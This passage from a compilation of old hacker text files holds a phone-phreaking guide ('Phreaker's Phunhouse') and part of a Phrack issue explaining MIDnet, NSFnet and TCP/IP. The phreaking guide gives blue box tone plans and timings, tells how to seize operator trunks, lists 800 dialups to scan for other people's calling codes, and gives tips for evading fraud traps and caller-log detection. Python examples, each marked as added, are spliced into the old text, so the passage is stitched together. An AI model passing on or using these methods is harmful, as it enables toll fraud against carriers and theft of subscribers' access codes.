code, leaving the 3-4 digit pswd up to you. Much like trashing down at good old
ma bell.
121.Phreaker's Phunhouse by the Jolly Roger
The long awaited prequel to Phreaker's Guide has finally arrived. Conceived from
the boredom and loneliness that could only be derived from: The Traveler! But
now, he has returned in full strength (after a small vacation) and is here to
'World Premiere' the new files everywhere. Stay cool. This is the prequel to the
first one, so just relax. This is not made to be an exclusive ultra elite file,
so kinda calm down and watch in the background if you are too cool for it.
Phreak Dictionary
Here you will find some of the basic but necessary terms that should be known by
any phreak who wants to be respected at all.
Phreak:
1. The action of using mischievous and mostly illegal ways in order to not pay
for some sort of telecommunications bill, order, transfer, or other service. It
often involves usage of highly illegal
boxes and machines in order to defeat the security that is set up to avoid this
sort of happening. [fr'eaking]. v.
2. A person who uses the above methods of destruction and chaos in order to make
a better life for all. A true phreaker will not go against his fellows or narc
on people who have ragged on
him or do anything termed to be dishonorable to phreaks. [fr'eek]. n.
3. A certain code or dialup useful in the action of being a phreak. (Example: "I
hacked a new metro phreak last night.")
Switching System:
1. There are 3 main switching systems currently employed in the US, and a few
other systems will be mentioned as background.
· SxS: This system was invented in 1918 and was employed in over half of the
country until 1978. It is a very basic system that is a general waste of energy
and hard work on the linesman. A
good way to identify this is that it requires a coin in the phone booth before
it will give you a dial tone, or that no call waiting, call forwarding, or any
other such service is available. Stands for: Step by
Step
· XB: This switching system was first employed in 1978 in order to take care of
most of the faults of SxS switching. Not only is it more efficient, but it also
can support different services in
various forms. XB1 is Crossbar Version 1. That is very limited and is hard to
distinguish from SxS except by direct view of the wiring involved. Next up was
XB4, Crossbar Version 4. With this
system, some of the basic things like DTMF that were not available with SxS can
be accomplished. For the final stroke of XB, XB5 was created. This is a service
that can allow DTMF plus most 800
type services (which were not always available.) Stands for: Crossbar.
· ESS: A nightmare in telecom. In vivid color, ESS is a pretty bad thing to have
to stand up to. It is quite simple to identify. Dialing 911 for emergencies, and
ANI [see ANI below] are the
most common facets of the dread system. ESS has the capability to list in a
person's caller log what number was called, how long the call took, and even the
status of the conversation (modem or
otherwise.) Since ESS has been employed, which has been very recently, it has
gone through many kinds of revisions. The latest system to date is ESS 11a, that
is employed in Washington D.C. for
security reasons. ESS is truly trouble for any phreak, because it is 'smarter'
than the other systems. For instance, if on your caller log they saw 50 calls to
1-800-421-9438, they would be able to do a
CN/A [see Loopholes below] on your number and determine whether you are
subscribed to that service or not. This makes most calls a hazard, because
although 800 numbers appear to be free, they
are recorded on your caller log and then right before you receive your bill it
deletes the billings for them. But before that they are open to inspection, which
is one reason why extended use of any code is
dangerous under ESS. Some of the boxes [see Boxing below] are unable to function
in ESS. It is generally a menace to the true phreak. Stands For: Electronic
Switching System. Because they could
appear on a filter somewhere or maybe it is just nice to know them anyways.
· SSS: Strowger Switching System. First non-operator system available.
· WES: Western Electronics Switching. Used about 40 years ago with some minor
places out west.
Boxing:
1. The use of personally designed boxes that emit or cancel electronic
impulses that allow simpler acting while phreaking. Through the use of separate
boxes, you can accomplish most feats
possible with or without the control of an operator.
2. Some boxes and their functions are listed below. Ones marked with '*'
indicate that they are not operable in ESS.
· *Black Box: Makes it seem to the phone company that the phone was never picked
up.
· Blue Box: Emits a 2600hz tone that allows you to do such things as stack a
trunk line, kick the operator off line, and others.
· Red Box: Simulates the noise of a quarter, nickel, or dime being dropped into
a payphone.
· Cheese Box: Turns your home phone into a pay phone to throw off traces (a red
box is usually needed in order to call out.)
· *Clear Box: Gives you a dial tone on some of the old SxS payphones without
putting in a coin.
· Beige Box: A simpler produced linesman's handset that allows you to tap into
phone lines and extract by eavesdropping, or crossing wires, etc.
· Purple Box: Makes all calls made out from your house seem to be local calls.
ANI [ANI]:
1. Automatic Number Identification. A service available on ESS that allows a
phone service [see Dialups below] to record the number that any certain code was
dialed from along with the
number that was called and print both of these on the customer bill.
2. dialups [see Dialups below] are all designed just to use ANI. Some of the
services do not have the proper equipment to read the ANI impulses yet, but it
is impossible to see which is which
without being busted or not busted first.
Dialups [dy'l'ups]:
1. Any local or 800 extended outlet that allows instant access to any service
such as MCI, Sprint, or AT&T that from there can be used by hand-picking or
using a program to reveal other
peoples codes which can then be used moderately until they find out about it and
you must switch to another code (preferably before they find out about it.)
2. Dialups are extremely common on both senses. Some dialups reveal the company
that operates them as soon as you hear the tone. Others are much harder and some
you may never be
able to identify. A small list of dialups:
1-800-421-9438 (5 digit codes)
1-800-547-6754 (6 digit codes)
1-800-345-0008 (6 digit codes)
1-800-734-3478 (6 digit codes)
1-800-222-2255 (5 digit codes)
3. Codes: Codes are very easily accessed procedures when you call a dialup. They
will give you some sort of tone. If the tone does not end in 3 seconds, then
punch in the code and
immediately following the code, the number you are dialing but strike the '1' in
the beginning out first. If the tone does end, then punch in the code when the
tone ends. Then, it will give you another tone.
Punch in the number you are dialing, or a '9'. If you punch in a '9' and the
tone stops, then you messed up a little. If you punch in a tone and the tone
continues, then simply dial the number you are
calling without the '1'.
4. All codes are not universal. The only type that I know of that is truly
universal is Metrophone. Almost every major city has a local Metro dialup (for
Philadelphia, (215)351-0100/0126) and
since the codes are universal, almost every phreak has used them once or twice.
They do not employ ANI in any outlets that I know of, so feel free to check
through your books and call 555-1212 or,
as a more devious manner, subscribe yourself. Then, never use your own code. That
way, if they check up on you due to your caller log, they can usually find out
that you are subscribed. Not only that
but you could set a phreak hacker around that area and just let it hack away,
since they usually group them, and, as a bonus, you will have their local
dialup.
5. 950's. They seem like a perfectly cool phreakers dream. They are free from
your house, from payphones, from everywhere, and they host all of the major long
distance companies
(950)1044 <MCI>, (950)1077 <Sprint>, 950-1088 <Skylines>, 950-1033 <US
Telecom>.) Well, they aren't. They were designed for ANI. That is the point, end
of discussion.
A phreak dictionary. If you remember all of the things contained on that file up
there, you may have a better chance of doing whatever it is you do. This next
section is maybe a little more
interesting...
Blue Box Plans:
These are some blue box plans, but first, be warned, there have been 2600hz tone
detectors out on operator trunk lines since XB4. The idea behind it is to use a
2600hz tone for a few very naughty
functions that can really make your day lighten up. But first, here are the
plans, or the heart of the file:
700 : 1 : 2 : 4 : 7 : 11 :
900 : + : 3 : 5 : 8 : 12 :
1100 : + : + : 6 : 9 : KP :
1300 : + : + : + : 10 : KP2 :
1500 : + : + : + : + : ST :
: 700 : 900 :1100 :1300 :1500 :
Stop! Before you diehard users start piecing those little tone tidbits together,
there is a simpler method. If you have an Apple-Cat with a program like Cat's
Meow IV, then you can generate the
necessary tones, the 2600hz tone, the KP tone, the KP2 tone, and the ST tone
through the dial section. So if you have that I will assume you can boot it up
and it works, and I'll do you the favor of
telling you and the other users what to do with the blue box now that you have
somehow constructed it. The connection to an operator is one of the most well
known and used ways of having fun with
your blue box. You simply dial a TSPS (Traffic Service Positioning Station, or
the operator you get when you dial '0') and blow a 2600hz tone through the line.
Watch out! Do not dial this direct! After
you have done that, it is quite simple to have fun with it. Blow a KP tone to
start a call, a ST tone to stop it, and a 2600hz tone to hang up. Once you have
connected to it, here are some fun numbers to
call with it:
0-700-456-1000 Teleconference (free, because you are the operator!)
(Area code)-101 Toll Switching
(Area code)-121 Local Operator (hehe)
(Area code)-131 Information
(Area code)-141 Rate & Route
(Area code)-181 Coin Refund Operator
(Area code)-11511 Conference operator (when you dial 800-544-6363)
Well, those were the tone matrix controllers for the blue box and some other
helpful stuff to help you to start out with. But those are only the functions
with the operator. There are other k-fun things
you can do with it.
More advanced Blue Box Stuff:
Oops. Small mistake up there. I forgot tone lengths. Um, you blow a tone pair
out for up to 1/10 of a second with another 1/10 second for silence between the
digits. KP tones should be sent for 2/10
of a second. One way to confuse the 2600hz traps is to send pink noise over the
channel (for all of you that have decent BSR equalizers, there is major pink
noise in there.)
Using the operator functions is the use of the 'inward' trunk line. That is
working it from the inside. From the 'outward' trunk, you can do such things as
make emergency breakthrough calls, tap into
lines, busy all of the lines in any trunk (called 'stacking'), enable or disable
the TSPS's, and for some 4a systems you can even re-route calls to anywhere.
All right. The one thing that every complete phreak guide should be without is
blue box plans, since they were once a vital part of phreaking. Another thing
that every complete file needs is a complete
listing of all of the 800 numbers around so you can have some more fun.
/-/ 800 Dialup Listings /-/
1-800-345-0008 (6) 1-800-547-6754 (6)
1-800-245-4890 (4) 1-800-327-9136 (4)
1-800-526-5305 (8) 1-800-858-9000 (3)
1-800-437-9895 (7) 1-800-245-7508 (5)
1-800-343-1844 (4) 1-800-322-1415 (6)
1-800-437-3478 (6) 1-800-325-7222 (6)
All right, set Cat Hacker 1.0 on those numbers and have a fuck of a day. That is
enough with 800 codes, by the time this gets around to you I don't know what
state those codes will be in, but try them
all out anyways and see what you get. On some 800 services now, they have an
operator who will answer and ask you for your code, and then your name. Some
will switch back and forth between
voice and tone verification, you can never be quite sure which you will be up
against.
Armed with this knowledge you should be having a pretty good time phreaking now.
But class isn't over yet, there are still a couple important rules that you
should know. If you hear continual clicking
on the line, then you should assume that an operator is messing with something,
maybe even listening in on you. It is a good idea to call someone back when the
phone starts doing that. If you were
using a code, use a different code and/or service to call him back.
A good way to detect if a code has gone bad or not is to listen when the number
has been dialed. If the code is bad you will probably hear the phone ringing
more clearly and more quickly than if you
were using a different code. If someone answers voice to it then you can
immediately assume that it is an operative for whatever company you are using.
The famed '311311' code for Metro is one of
those. You would have to be quite stupid to actually respond, because whoever
you ask for the operator will always say 'He's not in right now, can I have him
call you back?' and then they will ask for
your name and phone number. Some of the more sophisticated companies will
actually give you a carrier on a line that is supposed to give you a carrier and
then just have garbage flow across the
screen like it would with a bad connection. That is a feeble effort to make you
think that the code is still working and maybe get you to dial someone's voice,
a good test for the carrier trick is to dial a
number that will give you a carrier that you have never dialed with that code
before, that will allow you to determine whether the code is good or not. For
our next section, a lighter look at some of the
things that a phreak should not be without. A vocabulary.
A few months ago, it was a quite strange world for the modem people out there.
But now, a phreaker's vocabulary is essential if you wanna make a good
impression on people when you post what you
know about certain subjects.
/-/ Vocabulary /-/
- Do not misspell except certain exceptions:
phone -> fone
freak -> phreak
- Never substitute 'z's for 's's. (i.e. codez -> codes)
- Never leave many characters after a post (i.e. Hey Dudes!#!@#@!#!@)
- NEVER use the 'k' prefix (k-kool, k-rad, k-whatever)
- Do not abbreviate. (I got lotsa wares w/ docs)
- Never substitute '0' for 'o' (r0dent, l0zer).
- Forget about ye old upper case, it looks ruggyish.
All right, that was to relieve the tension of what is being drilled into your
minds at the moment. Now, however, back to the teaching course. Here are some
things you should know about phones and
billings for phones, etc.
LATA: Local Access Transference Area. Some people who live in large cities or
areas may be plagued by this problem. For instance, let's say you live in the
215 area code under the 542 prefix
(Ambler, Fort Washington). If you went to dial in a basic Metro code from that
area, for instance, 351-0100, that might not be counted under unlimited local
calling because it is out of your LATA.
For some LATA's, you have to dial a '1' without the area code before you can
dial the phone number. That could prove a hassle for us all if you didn't
realize you would be billed for that sort of call. In
that way, sometimes, it is better to be safe than sorry and phreak.
The Caller Log: In ESS regions, for every household around, the phone company
has something on you called a Caller Log. This shows every single number that
you dialed, and things can be arranged
so it showed every number that was calling to you. That's one main disadvantage
of ESS, it is mostly computerized so a number scan could be done like that quite
easily. Using a dialup is an easy way
to screw that, and is something worth remembering. Anyways, with the caller log,
they check up and see what you dialed. Hmm... you dialed 15 different 800
numbers that month. Soon they find that
you are subscribed to none of those companies. But that is not the only thing.
Most people would imagine "But wait! 800 numbers don't show up on my phone
bill!". To those people, it is a nice
thought, but 800 numbers are picked up on the caller log until right before they
are sent off to you. So they can check right up on you before they send it away
and can note the fact that you fucked up
slightly and called one too many 800 lines.
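The caller-log review described above, seen from the carrier's side, as an added example that is not part of the original file. The record layout, the fictitious 555-01xx numbers, the carrier names and both thresholds are assumptions made for illustration.

```python
from collections import Counter, defaultdict

# Constructed reference data: toll-free access numbers ("dialups") and the
# long-distance service each one belongs to. All numbers are fictitious.
DIALUP_OWNER = {
    "1-800-555-0100": "CarrierA",
    "1-800-555-0101": "CarrierB",
    "1-800-555-0102": "CarrierC",
    "1-800-555-0103": "CarrierD",
}

# Constructed subscription records: caller -> services they really pay for.
SUBSCRIPTIONS = {"215-555-0122": {"CarrierA"}}


def build_sample_log():
    """Return constructed caller-log rows: (caller, dialed number, month)."""
    log = []
    # Caller 0111 touches every dialup once and subscribes to none of them.
    for number in DIALUP_OWNER:
        log.append(("215-555-0111", number, "1989-06"))
    # Caller 0122 uses one dialup heavily but is a real CarrierA customer.
    log += [("215-555-0122", "1-800-555-0100", "1989-06")] * 25
    # Caller 0133 uses one dialup heavily without a subscription.
    log += [("215-555-0133", "1-800-555-0101", "1989-06")] * 25
    # Caller 0144 dials an ordinary toll-free number that is not a dialup.
    log.append(("215-555-0144", "1-800-555-0199", "1989-06"))
    return log


def flag_callers(log, dialup_owner, subscriptions,
                 max_distinct=3, max_repeat=20):
    """Flag callers whose dialup usage does not match their subscriptions.

    Two signals, both taken from the text: many different dialups in one
    billing month, or many calls to one dialup the caller does not
    subscribe to. Thresholds are illustrative assumptions.
    """
    unsubscribed = defaultdict(Counter)
    for caller, dialed, month in log:
        carrier = dialup_owner.get(dialed)
        if carrier is None:
            continue  # not a long-distance access number
        if carrier in subscriptions.get(caller, set()):
            continue  # legitimate customer of that service
        unsubscribed[(caller, month)][dialed] += 1

    findings = {}
    for key, counts in unsubscribed.items():
        reasons = []
        if len(counts) > max_distinct:
            reasons.append(f"{len(counts)} distinct unsubscribed dialups")
        for dialed, n in sorted(counts.items()):
            if n > max_repeat:
                reasons.append(f"{n} calls to {dialed}")
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for key, reasons in flag_callers(build_sample_log(), DIALUP_OWNER,
                                     SUBSCRIPTIONS).items():
        print(key, reasons)
```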
Right now, after all of that, you should have a pretty good idea of how to grow
up as a good phreak. Follow these guidelines, don't show off, and don't take
unnecessary risks when phreaking or
hacking.
122.Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning
Prologue
If you are not already familiar with NSFnet, I would suggest that you read
"Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely
"NSFnet: National Science Foundation Network" (Phrack Inc., Volume Three, Issue
26, File 4 of 11).
Introduction
MIDNET is a regional computer network that is part of the NSFnet, the National
Science Foundation Network. Currently, eleven mid-United States universities
are connected to each other and to the NSFnet via MIDnet:
UA - University of Arkansas at Fayetteville
ISU - Iowa State University at Ames
UI - University of Iowa at Iowa City
KSU - Kansas State University at Manhattan
KU - University of Kansas at Lawrence
UMC - University of Missouri at Columbia
WU - Washington University at St. Louis, Missouri
UNL - University of Nebraska at Lincoln
OSU - Oklahoma State University at Stillwater
UT - University of Tulsa (Oklahoma)
OU - University of Oklahoma at Norman
Researchers at any of these universities that have funded grants can access the
six supercomputer centers funded by the NSF:
John von Neumann Supercomputer Center
National Center for Atmospheric Research
Cornell National Supercomputer Facility
National Center for Supercomputing Applications
Pittsburgh Supercomputing Center
San Diego Supercomputing Center
In addition, researchers and scientists can communicate with each other over a
vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet,
BITnet, and others that you have read
about in The Future Transcendent Saga. Please refer to "Frontiers" (Phrack Inc.,
Volume Two, Issue 24, File 4 of 13) for more details.
MIDnet is just one of several regional computer networks that comprise the
NSFnet system. Although all of these regional computer networks work the same,
MIDnet is the only one that I have direct
access to and so this file is written from a MIDnet point of view. For people
who have access to the other regional networks of NSFnet, the only real
differences depicted in this file that would not
apply to the other regional networks are the universities that are served by
MIDnet as opposed to:
NYSERnet in New York State
SURAnet in the southeastern United States
SESQUInet in Texas
BARRnet in the San Francisco area
MERIT in Michigan
(There are others that are currently being constructed.)
These regional networks all hook into the NSFnet backbone, which is a network
that connects the six supercomputer centers. For example, a person at Kansas
State University can connect with a
supercomputer via MIDnet and the NSFnet backbone. That researcher can also send
mail to colleagues at the University of Delaware by using MIDnet, NSFnet and
SURAnet. Each university has its
own local computer network which connects on-campus computers as well as
providing a means to connecting to a regional network.
Some universities are already connected to older networks such as CSnet, the
ARPAnet and BITnet. In principle, any campus connected to any of these networks
can access anyone else in any other network since there are gateways between
the networks.
Gateways are specialized computers that forward network traffic, thereby
connecting networks. In practice, these wide-area networks use different
networking technology, which makes it impossible to provide full functionality
across the gateways. However, mail is almost universally supported across all
gateways, so that a person at a BITnet site can send mail messages to a
colleague at an ARPAnet site (or anywhere else for that matter). You should
already be somewhat familiar with this, but if not, refer to "Limbo To Infinity"
(Phrack Inc., Volume Two, Issue 24, File 3 of 13) and "Internet Domains" (Phrack
Inc., Volume Three, Issue 26, File 8 of 11).
Computer networks rely on hardware and software that allow computers to
communicate. The language that enables network communication is called a
protocol. There are many different protocols in
use today. MIDnet uses the TCP/IP protocols, also known as the DOD (Department
of Defense) Protocol Suite.
Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet. In fact,
all the regional networks that are linked to the NSFnet backbone are required to
use TCP/IP. At the local campus
level, TCP/IP is often used, although other protocols such as IBM's SNA and
DEC's DECnet are common. In order to communicate with a computer via MIDnet and
the NSFnet, a computer at a
campus must use TCP/IP directly or use a gateway that will translate its
protocols into TCP/IP.
The Internet is a world-wide computer network that is the conglomeration of most
of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the
regionals, such as MIDnet. To a lesser
degree, other networks such as BITnet that can send mail to hosts on these
networks are included as part of the Internet. This huge network of networks,
the Internet, as you have by now read all
about in the pages of Phrack Inc., is a rapidly growing and very complex entity
that allows sophisticated communication between scientists, students, government
officials and others. Being a part of this
community is both exciting and challenging.
This chapter of the Future Transcendent Saga gives a general description of the
protocols and software used in MIDnet and the NSFNet. A discussion of several of
the more commonly used
networking tools is also included to enable you to make practical use of the
network as soon as possible.
The DOD Protocol Suite
The DOD Protocol Suite includes many different protocols. Each protocol is a
specification of how communication is to occur between computers. Computer
hardware and software vendors use the
protocol to create programs and sometimes specialized hardware in order to
implement the network function intended by the protocol. Different
implementations of the same protocol exist for the
varied hardware and operating systems found in a network.
The three most commonly used network functions are:
Mail -- Sending and receiving messages
File Transfer -- Sending and receiving files
Remote Login -- Logging into a distant computer
Of these, mail is probably the most commonly used.
In the TCP/IP world, there are three different protocols that realize these
functions:
SMTP -- (Simple Mail Transfer Protocol) Mail
FTP -- (File Transfer Protocol) sending and receiving files
Telnet -- Remote login
How to use these protocols is discussed in the next section. At first glance, it
is not obvious why these three functions are the most common. After all, mail
and file transfer seem to be the same thing.
However, mail messages are not identical to files, since they are usually
comprised of only ASCII characters and are sequential in structure. Files may
contain binary data and have complicated,
non-sequential structures. Also, mail messages can usually tolerate some errors
in transmission whereas files should not contain any errors. Finally, file
transfers usually occur in a secure setting (i.e. The
users who are transferring files know each other's names and passwords and are
permitted to transfer the file, whereas mail can be sent to anybody as long as
their name is known).
While mail and file transfer accomplish the transfer of raw information from one
computer to another, Telnet allows a distant user to process that information,
either by logging in to a remote computer or by
linking to another terminal. Telnet is most often used to remotely log in to a
distant computer, but it is actually a general-purpose communications protocol.
I have found it incredibly useful over the last
year. In some ways, it could be used for a great deal of access because you can
directly connect to another computer anywhere that has TCP/IP capabilities,
however please note that Telnet is
*NOT* Telenet. There are other functions that some networks provide, including
the following:
· Name to address translation for networks, computers and people
· The current time
· Quote of the day or fortune
· Printing on a remote printer, or use of any other remote peripheral
· Submission of batch jobs for non-interactive execution
· Dialogues and conferencing between multiple users
· Remote procedure call (i.e. Distributing program execution over several remote
computers)
· Transmission of voice or video information
Some of these functions are still in the experimental stages and require faster
computer networks than currently exist. In the future, new functions will
undoubtedly be invented and existing ones
improved.
The DOD Protocol Suite is a layered network architecture, which means that
network functions are performed by different programs that work independently
and in harmony with each other. Not only
are there different programs but there are different protocols. The protocols
SMTP, FTP and Telnet are described above. Protocols have been defined for
getting the current time, the quote of the day,
and for translating names. These protocols are called applications protocols
because users directly interact with the programs that implement these
protocols.
The Transmission Control Protocol, TCP, is used by many of the application
protocols. Users almost never interact with TCP directly. TCP establishes a
reliable end-to-end connection between two
processes on remote computers. Data is sent through a network in small chunks
called packets to improve reliability and performance. TCP ensures that packets
arrive in order and without errors. If a
packet does have errors, TCP requests that the packet be retransmitted.
In turn, TCP calls upon IP, Internet Protocol, to move the data from one network
to another. IP is still not the lowest layer of the architecture, since there is
usually a "data link layer protocol" below it.
This can be any of a number of different protocols, two very common ones being
X.25 and Ethernet.
FTP, Telnet and SMTP are called "application protocols", since they are directly
used by applications programs that enable users to make use of the network.
Network applications are the actual
programs that implement these protocols and provide an interface between the
user and the computer. An implementation of a network protocol is a program or
package of programs that provides the
desired network function such as file transfer. Since computers differ from
vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its own
implementation of these protocols. However,
the protocols are standardized so that computers can interoperate over the
network (i.e. Can understand and process each other's data). For example, a TCP
packet generated by an IBM computer can
be read and processed by a DEC computer.
In many instances, network applications programs use the name of the protocol.
For example, the program that transfers files may be called "FTP" and the
program that allows remote logins may be
called "Telnet." Sometimes these protocols are incorporated into larger
packages, as is common with SMTP. Many computers have mail programs that allow
users on the same computer to send mail
to each other. SMTP functions are often added to these mail programs so that
users can also send and receive mail through a network. In such cases, there is
no separate program called SMTP that
the user can access, since the mail program provides the user interface to this
network function.
Specific implementations of network protocols, such as FTP, are tailored to the
computer hardware and operating system on which they are used. Therefore, the
exact user interface varies from one
implementation to another. For example, the FTP protocol specifies a set of FTP
commands which each FTP implementation must understand and process. However,
these are usually placed at a low
level, often invisible to the user, who is given a higher set of commands to
use.
These higher-level commands are not standardized so they may vary from one
implementation of FTP to another. For some operating systems, not all of these
commands make equal sense, such as
"Change Directory," or may have different meanings. Therefore the specific user
interface that the user sees will probably differ.
This file describes a generic implementation of the standard TCP/IP application
protocols. Users must consult local documentation for specifics at their sites.
Names and Addresses In A Network
In the DOD Protocol Suite, each network is given a unique identifying number. This
number is assigned by a central authority, namely the Network Information Center
run by SRI, abbreviated as
SRI-NIC, in order to prevent more than one network from having the same network
number. For example, the ARPAnet has network number 10 while MIDnet has a longer
number, namely 128.242.
Each host in a network has a unique identification so other hosts can specify
them unambiguously. Host numbers are usually assigned by the organization that
manages the network, rather than one
central authority. Host numbers do not need to be unique throughout the whole
Internet but two hosts on the same network need to have unique host numbers.
The combination of the network number and the host number is called the IP
address of the host and is specified as a 32-bit binary number. All IP addresses
in the Internet are expressible as 32-bit
numbers, although they are often written in dotted decimal notation. Dotted
decimal notation breaks the 32-bit number into four eight-bit parts or octets
and each octet is specified as a decimal number.
For example, 00000001 is the binary octet that specifies the decimal number 1,
while 11000000 specifies 192. Dotted decimal notation makes IP addresses much
easier to read and remember.
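The conversion just described, as an added example that is not part of the original file. It also splits an address into network number and host number using the classful rule (class A, B, C) that was in force when this file was written; the file does not name that rule, but it is why ARPAnet's network number 10 is one octet and MIDnet's 128.242 is two. The host parts of the sample addresses are constructed.

```python
def parse_dotted(addr: str) -> int:
    """Strictly parse 'a.b.c.d' into the 32-bit number it stands for."""
    parts = addr.split(".")
    if len(parts) != 4:
        raise ValueError(f"{addr!r}: expected four octets")
    value = 0
    for part in parts:
        # Only plain ASCII digits are accepted. A leading zero is refused
        # because some parsers read "010" as octal 8 rather than decimal 10.
        if not (part.isascii() and part.isdigit()):
            raise ValueError(f"{addr!r}: octet {part!r} is not decimal")
        if len(part) > 1 and part.startswith("0"):
            raise ValueError(f"{addr!r}: octet {part!r} has a leading zero")
        octet = int(part)
        if octet > 255:
            raise ValueError(f"{addr!r}: octet {octet} does not fit in 8 bits")
        value = (value << 8) | octet
    return value


def to_dotted(value: int) -> str:
    """Render a 32-bit number as four decimal octets."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit value")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def split_classful(addr: str):
    """Return (class, network number, host number) for a class A/B/C address."""
    value = parse_dotted(addr)
    first_octet = value >> 24
    if first_octet < 128:        # leading bit 0    -> 8-bit network number
        cls, net_bits = "A", 8
    elif first_octet < 192:      # leading bits 10  -> 16-bit network number
        cls, net_bits = "B", 16
    elif first_octet < 224:      # leading bits 110 -> 24-bit network number
        cls, net_bits = "C", 24
    else:
        raise ValueError(f"{addr!r}: class D/E has no network/host split")
    host_bits = 32 - net_bits
    network_number = ".".join(addr.split(".")[: net_bits // 8])
    host_number = value & ((1 << host_bits) - 1)
    return cls, network_number, host_number


if __name__ == "__main__":
    # Constructed host addresses on the networks the text mentions.
    for sample in ("10.0.0.51", "128.242.7.9", "192.9.9.1"):
        number = parse_dotted(sample)
        print(sample, format(number, "032b"), split_classful(sample))
```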
Computers in the Internet are also identified by hostnames, which are strings of
characters, such as "phrackvax." However, IP packets must specify the 32-bit IP
address instead of the hostname so
some way of translating hostnames to IP addresses must exist.
One way is to have a table of hostnames and their corresponding IP addresses,
called a hosttable. Nearly every TCP/IP implementation has such a hosttable,
although the weaknesses of this method
are forcing a shift to a new scheme called the domain name system. In UNIX
systems, the hosttable is often called "/etc/hosts." You can usually read this
file and find out what the IP addresses of
various hosts are. Other systems may call this file by a different name and make
it unavailable for public viewing.
Users of computers are generally given accounts to which all charges for
computer use are billed. Even if computer time is free at an installation,
accounts are used to distinguish between the users and
enforce file protections. The generic term "username" will be used in this file
to refer to the name by which the computer account is accessed.
In the early days of the ARPAnet, which was the first network to use the TCP/IP
protocols, computer users were identified by their username, followed by a
commercial "at" sign (@), followed by the
hostname on which the account existed. Networks were not given names, per se,
although the IP address specified a network number.
For example, "knight@phrackvax" referred to user "knight" on host "phrackvax."
This did not specify which network "phrackvax" was on, although that information
could be obtained by examining the
hosttable and the IP address for "phrackvax." (However, "phrackvax" is a
fictitious hostname used for this presentation.)
As time went on, every computer on the network had to have an entry in its
hosttable for every other computer on the network. When several networks linked
together to form the Internet, the
problem of maintaining this central hosttable got out of hand. Therefore, the
domain name scheme was introduced to split up the hosttable and make it smaller
and easier to maintain.
In the new domain name scheme, users are still identified by their usernames,
but hosts are now identified by their hostname and any and all domains of which
they are a part. For example, the address
"KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB".
However, host "UMCVMB" is a part of the domain "MISSOURI", which is in turn
part of the
domain "EDU". There are other domains in "EDU", although only one is named
"MISSOURI". In the domain "MISSOURI", there is only one host named "UMCVMB".
However, other domains in "EDU" could theoretically have hosts named "UMCVMB"
(although I would say that this is rather unlikely in this example). Thus the
combination of hostname and all its
domains makes it unique. The method of translating such names into IP addresses
is no longer as straightforward as looking up the hostname in a table. Several
protocols and specialized network
software called nameservers and resolvers implement the domain name scheme.
Not all TCP/IP implementations support domain names because the scheme is rather new. In
those cases, the local hosttable provides the only way to translate hostnames to
IP addresses. The system manager
of that computer will have to put an entry into the hosttable for every host
that users may want to connect to. In some cases, users may consult the
nameserver themselves to find out the IP address for
a given hostname and then use that IP address directly instead of a hostname.
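A hosttable lookup of the kind described above, as an added example that is not part of the original file. On a system where the hosttable is the only source of translations, a name bound to two addresses silently decides where connections go, so the example also reports such conflicts; the "first entry wins" rule and the phrackvax entries are assumptions of this example.

```python
import ipaddress

# Constructed sample in /etc/hosts format. The first three addresses are taken
# from the host list in this file; the two "phrackvax" lines are invented.
SAMPLE_HOSTTABLE = """\
128.206.1.1   umcvmb.missouri.edu umcvmb
26.0.0.73     sri-nic.arpa sri-nic     # DDN Network Information Center
18.72.0.39    athena.mit.edu
10.0.0.99     phrackvax                # fictitious host
10.0.0.42     PHRACKVAX                # second, conflicting entry
"""


def parse_hosttable(text: str) -> dict:
    """Return {lower-cased hostname: [addresses in file order]}."""
    table = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            raise ValueError(f"line {lineno}: address without a hostname")
        addr, names = fields[0], fields[1:]
        try:
            ipaddress.IPv4Address(addr)          # reject malformed addresses
        except ValueError as exc:
            raise ValueError(f"line {lineno}: {exc}") from None
        for name in names:                       # official name, then aliases
            addrs = table.setdefault(name.lower(), [])
            if addr not in addrs:
                addrs.append(addr)
    return table


def resolve(table: dict, target: str) -> str:
    """Translate a hostname to an address; a literal address passes through."""
    try:
        return str(ipaddress.IPv4Address(target))
    except ValueError:
        pass                                     # not an address, so look it up
    addrs = table.get(target.lower())            # hostnames are case-insensitive
    if not addrs:
        raise LookupError(f"{target}: not in hosttable")
    return addrs[0]                              # assumption: first entry wins


def conflicting_names(table: dict) -> dict:
    """Names that map to more than one address (stale or tampered entries)."""
    return {name: addrs for name, addrs in table.items() if len(addrs) > 1}


if __name__ == "__main__":
    hosts = parse_hosttable(SAMPLE_HOSTTABLE)
    for name in ("UMCVMB", "sri-nic.arpa", "26.0.0.73"):
        print(name, "->", resolve(hosts, name))
    print("conflicts:", conflicting_names(hosts))
```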
I have selected a few network hosts to demonstrate how a host system can be
specified by both the hostname and host numerical address. Some of the nodes I
have selected are also nodes on
BITnet, perhaps even some of the others that I do not make a note of due to a lack
of omniscient awareness about each and every single host system in the world :-)
Numerical       Hostname                    Location                            BITnet
18.72.0.39      ATHENA.MIT.EDU              Mass. Institute of Technology       MIT
26.0.0.73       SRI-NIC.ARPA                DDN Network Information Center      -
36.21.0.13      MACBETH.STANFORD.EDU        Stanford University                 ?
36.21.0.60      PORTIA.STANFORD.EDU         Stanford University                 ?
128.2.11.131    ANDREW.CMU.EDU              Carnegie Mellon Univ.               ANDREW
128.3.254.13    LBL.GOV                     Lawrence Berkeley Laboratories      LBL
128.6.4.7       RUTGERS.RUTGERS.EDU         Rutgers University                  ?
128.59.99.1     CUCARD.MED.COLUMBIA.EDU     Columbia University                 ?
128.102.18.3    AMES.ARC.NASA.GOV           Ames Research Center [NASA]         -
128.103.1.1     HARVARD.EDU                 Harvard University                  HARVARD
128.111.24.40   HUB.UCSB.EDU                Univ. of Santa Barbara              ?
